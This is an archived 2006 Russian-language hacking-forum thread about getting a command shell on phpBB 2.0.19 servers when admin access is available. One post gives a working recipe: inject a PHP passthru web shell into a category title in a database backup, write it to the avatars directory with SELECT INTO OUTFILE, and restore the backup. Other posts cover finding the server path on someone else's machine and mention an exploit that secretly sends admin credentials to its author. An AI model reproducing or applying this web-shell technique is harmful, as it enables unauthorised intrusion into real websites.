ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
phpBB 2.0.19 + shell, если есть права админа |
13.06.2006, 21:51
|
|
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
Провел на форуме:
1652093
Репутация:
490
|
|
phpBB 2.0.19 + shell, если есть права админа
|
|
|
13.06.2006, 21:59
|
|
Участник форума
Регистрация: 09.05.2006
Сообщений: 245
Провел на форуме:
565298
Репутация:
47
|
|
|
|
|
|
13.06.2006, 22:39
|
|
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553
Репутация:
1316
|
|
кинь сцылку в пм, посмотрим что к чему
|
|
|
|
13.06.2006, 22:53
|
|
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
Провел на форуме:
1652093
Репутация:
490
|
|
Пробовал, но команды не выполняются, не знаю почему...
|
|
|
|
13.06.2006, 23:21
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021
Репутация:
1879
|
|
Блин, я шелл в 2.0.19 делал так... заходил в админку, сохранял БД на винт, искал там вот таку строку:
INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', 'test', '10');
потом заменял на
INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', '<? passthru("$cmd"); ?>', '10');
SELECT cat_title INTO OUTFILE '/home/test2.ru/www/phpbb/images/avatars/shell.php' FROM phpbb_categories where cat_id=1;
UPDATE phpbb_categories SET cat_title='test'WHERE cat_id=1; (после этой строки поставь ещё один Enter). Сохранял файл... и восстанавливал БД. После вот по этому
home/test2.ru/www/phpbb/images/avatars/shell.php у меня был шелл. НУ а дальше сам!  |
|
|
|
13.06.2006, 23:31
|
|
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
Провел на форуме:
1652093
Репутация:
490
|
|
Dr.Check
Я так тоже делал на локалхосте, всё легко, так как ты знаеш полный путь к форуму
home/test2.ru/www/phpbb
А как ты собираешся его узнать на чужом серваке?
|
|
|
|
13.06.2006, 23:46
|
|
Участник форума
Регистрация: 09.05.2006
Сообщений: 245
Провел на форуме:
565298
Репутация:
47
|
|
А ты сплойт подправил? Там ids маячок стоит....
|
|
|
|
13.06.2006, 23:58
|
|
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
Провел на форуме:
1652093
Репутация:
490
|
|
Сообщение от DimaHbl4
А ты сплойт подправил? Там ids маячок стоит....
А разве это как-то сказывается на его работе?
На локалхосте работал, а чтоб поправить не хватает заний перла... жаль
|
|
|
|
14.06.2006, 00:01
|
|
Участник форума
Регистрация: 09.05.2006
Сообщений: 245
Провел на форуме:
565298
Репутация:
47
|
|
А разве это как-то сказывается на его работе?
Кроме того что пароль и логин админа домой уходят никак ))))
|
|
|
|
14.06.2006, 00:05
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021
Репутация:
1879
|
|
/admin/admin_disallow.php?setmodules=1 вот этот путь вставь......
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
